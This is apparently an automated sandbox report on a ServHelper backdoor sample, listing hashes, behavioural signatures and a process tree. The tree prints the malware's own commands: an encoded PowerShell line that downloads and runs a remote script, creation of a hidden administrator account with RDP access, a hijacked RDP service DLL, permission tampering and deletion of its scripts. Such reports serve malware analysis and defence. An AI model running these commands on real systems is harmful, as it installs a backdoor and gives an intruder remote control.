Analysis
-
max time kernel
124s -
max time network
146s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
02-07-2021 05:29
Static task
static1
Behavioral task
behavioral1
Sample
b8c76065042d1557af857a48a5ac0f3e.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
b8c76065042d1557af857a48a5ac0f3e.exe
Resource
win10v20210410
General
-
Target
b8c76065042d1557af857a48a5ac0f3e.exe
-
Size
5.7MB
-
MD5
b8c76065042d1557af857a48a5ac0f3e
-
SHA1
7b5077cd4aaa5c97a768e9722828ebac94abe1f8
-
SHA256
e5dcf030290fd293d259f1c8ffbb65328c371e07fa34419af7723429599a7f6e
-
SHA512
59aa84a81ac66288b0d9b2d160ce6c3895d5a02bd48bceff659aeaf21df28c4996585378d302535f50b06d0592d65b5e6612714f7bec4d0df39e9bf514d54eba
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 10 944 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 1540 icacls.exe 2008 icacls.exe 1960 icacls.exe 1056 takeown.exe 1580 icacls.exe 1900 icacls.exe 1264 icacls.exe 1592 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000400000001310f-180.dat upx behavioral1/files/0x0005000000013110-181.dat upx -
Loads dropped DLL 2 IoCs
pid Process 836 Process not Found 836 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 1264 icacls.exe 1592 icacls.exe 1540 icacls.exe 2008 icacls.exe 1960 icacls.exe 1056 takeown.exe 1580 icacls.exe 1900 icacls.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
description ioc Process File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UVRW8DWNNSUR60TGCK5L.temp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e942dddf-8b0a-4a95-abfb-66ea18f49695 powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_51a9a062-cfc3-4c39-b64f-98d4033b0e8a powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e82c85b1-17db-49b6-aa6d-9bd40bafd001 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bb26a106-a631-4137-80de-03826bbdee05 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cfd7a969-97c5-472b-bc30-5ce480f5c9d6 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_73dc581c-dcde-4d10-acef-15c2d7d13d14 powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ae8865e9-575e-4b7a-8d6f-3f96c3647a22 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f8671b5a-908e-477d-bb5e-361a0dce7cb9 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dec346b9-d54f-4605-93af-9f705d93aa64 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ee516f50-46f3-4d47-9864-6503fed6b093 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b887a1d7-2dd4-4d8d-82dc-86278990cb31 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a06553d5036fd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1820 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 524 powershell.exe 524 powershell.exe 1016 powershell.exe 1016 powershell.exe 1896 powershell.exe 1896 powershell.exe 924 powershell.exe 924 powershell.exe 524 powershell.exe 524 powershell.exe 524 powershell.exe 944 powershell.exe 944 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 472 Process not Found 836 Process not Found 836 Process not Found 836 Process not Found 836 Process not Found -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 524 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeDebugPrivilege 1896 powershell.exe Token: SeDebugPrivilege 924 powershell.exe Token: SeRestorePrivilege 1900 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1540 WMIC.exe Token: SeIncreaseQuotaPrivilege 1540 WMIC.exe Token: SeAuditPrivilege 1540 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1540 WMIC.exe Token: SeIncreaseQuotaPrivilege 1540 WMIC.exe Token: SeAuditPrivilege 1540 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1588 WMIC.exe Token: SeIncreaseQuotaPrivilege 1588 WMIC.exe Token: SeAuditPrivilege 1588 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1588 WMIC.exe Token: SeIncreaseQuotaPrivilege 1588 WMIC.exe Token: SeAuditPrivilege 1588 WMIC.exe Token: SeDebugPrivilege 944 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2044 wrote to memory of 524 2044 b8c76065042d1557af857a48a5ac0f3e.exe 29 PID 2044 wrote to memory of 524 2044 b8c76065042d1557af857a48a5ac0f3e.exe 29 PID 2044 wrote to memory of 524 2044 b8c76065042d1557af857a48a5ac0f3e.exe 29 PID 524 wrote to memory of 1808 524 powershell.exe 31 PID 524 wrote to memory of 1808 524 powershell.exe 31 PID 524 wrote to memory of 1808 524 powershell.exe 31 PID 1808 wrote to memory of 2024 1808 csc.exe 32 PID 1808 wrote to memory of 2024 1808 csc.exe 32 PID 1808 wrote to memory of 2024 1808 csc.exe 32 PID 524 wrote to memory of 1016 524 powershell.exe 33 PID 524 wrote to memory of 1016 524 powershell.exe 33 PID 524 wrote to memory of 1016 524 powershell.exe 33 PID 524 wrote to memory of 1896 524 powershell.exe 35 PID 524 wrote to memory of 1896 524 powershell.exe 35 PID 524 wrote to memory of 1896 524 powershell.exe 35 PID 524 wrote to memory of 924 524 powershell.exe 37 PID 524 wrote to memory of 924 524 powershell.exe 37 PID 524 wrote to memory of 924 524 powershell.exe 37 PID 524 wrote to memory of 1056 524 powershell.exe 40 PID 524 wrote to memory of 1056 524 powershell.exe 40 PID 524 wrote to memory of 1056 524 powershell.exe 40 PID 524 wrote to memory of 1580 524 powershell.exe 41 PID 524 wrote to memory of 1580 524 powershell.exe 41 PID 524 wrote to memory of 1580 524 powershell.exe 41 PID 524 wrote to memory of 1900 524 powershell.exe 42 PID 524 wrote to memory of 1900 524 powershell.exe 42 PID 524 wrote to memory of 1900 524 powershell.exe 42 PID 524 wrote to memory of 1264 524 powershell.exe 43 PID 524 wrote to memory of 1264 524 powershell.exe 43 PID 524 wrote to memory of 1264 524 powershell.exe 43 PID 524 wrote to memory of 1592 524 powershell.exe 44 PID 524 wrote to memory of 1592 524 powershell.exe 44 PID 524 wrote to memory of 1592 524 powershell.exe 44 PID 524 wrote to memory of 1540 524 powershell.exe 45 PID 524 wrote to memory of 1540 524 powershell.exe 45 PID 524 wrote to memory of 1540 524 powershell.exe 45 PID 524 wrote to memory of 2008 524 powershell.exe 46 PID 524 wrote to memory of 2008 524 powershell.exe 46 PID 524 wrote to memory of 2008 524 powershell.exe 46 PID 524 wrote to memory of 1960 524 powershell.exe 47 PID 524 wrote to memory of 1960 524 powershell.exe 47 PID 524 wrote to memory of 1960 524 powershell.exe 47 PID 524 wrote to memory of 1772 524 powershell.exe 48 PID 524 wrote to memory of 1772 524 powershell.exe 48 PID 524 wrote to memory of 1772 524 powershell.exe 48 PID 524 wrote to memory of 1820 524 powershell.exe 49 PID 524 wrote to memory of 1820 524 powershell.exe 49 PID 524 wrote to memory of 1820 524 powershell.exe 49 PID 524 wrote to memory of 1660 524 powershell.exe 50 PID 524 wrote to memory of 1660 524 powershell.exe 50 PID 524 wrote to memory of 1660 524 powershell.exe 50 PID 524 wrote to memory of 1520 524 powershell.exe 51 PID 524 wrote to memory of 1520 524 powershell.exe 51 PID 524 wrote to memory of 1520 524 powershell.exe 51 PID 1520 wrote to memory of 1896 1520 net.exe 52 PID 1520 wrote to memory of 1896 1520 net.exe 52 PID 1520 wrote to memory of 1896 1520 net.exe 52 PID 524 wrote to memory of 992 524 powershell.exe 53 PID 524 wrote to memory of 992 524 powershell.exe 53 PID 524 wrote to memory of 992 524 powershell.exe 53 PID 992 wrote to memory of 1444 992 cmd.exe 54 PID 992 wrote to memory of 1444 992 cmd.exe 54 PID 992 wrote to memory of 1444 992 cmd.exe 54 PID 1444 wrote to memory of 1120 1444 cmd.exe 55
Processes
-
C:\Users\Admin\AppData\Local\Temp\b8c76065042d1557af857a48a5ac0f3e.exe"C:\Users\Admin\AppData\Local\Temp\b8c76065042d1557af857a48a5ac0f3e.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1sckqbo1\1sckqbo1.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB15.tmp" "c:\Users\Admin\AppData\Local\Temp\1sckqbo1\CSC20A18A0391434E2B93875EF626B0DB3E.TMP"4⤵PID:2024
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1056
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1580
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1264
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1592
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1540
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2008
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1960
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1772
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1820
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1660
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1896
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1864
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:960
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:924
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:400
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1760
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2008
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1264
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc AvQPWryX /add1⤵PID:2008
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc AvQPWryX /add2⤵PID:1772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc AvQPWryX /add3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:916
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:316
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵PID:992
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵PID:1676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵PID:2028
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1240
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:908
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc AvQPWryX1⤵PID:1708
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc AvQPWryX2⤵PID:1736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc AvQPWryX3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1016
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1620
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:572
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:944
-
-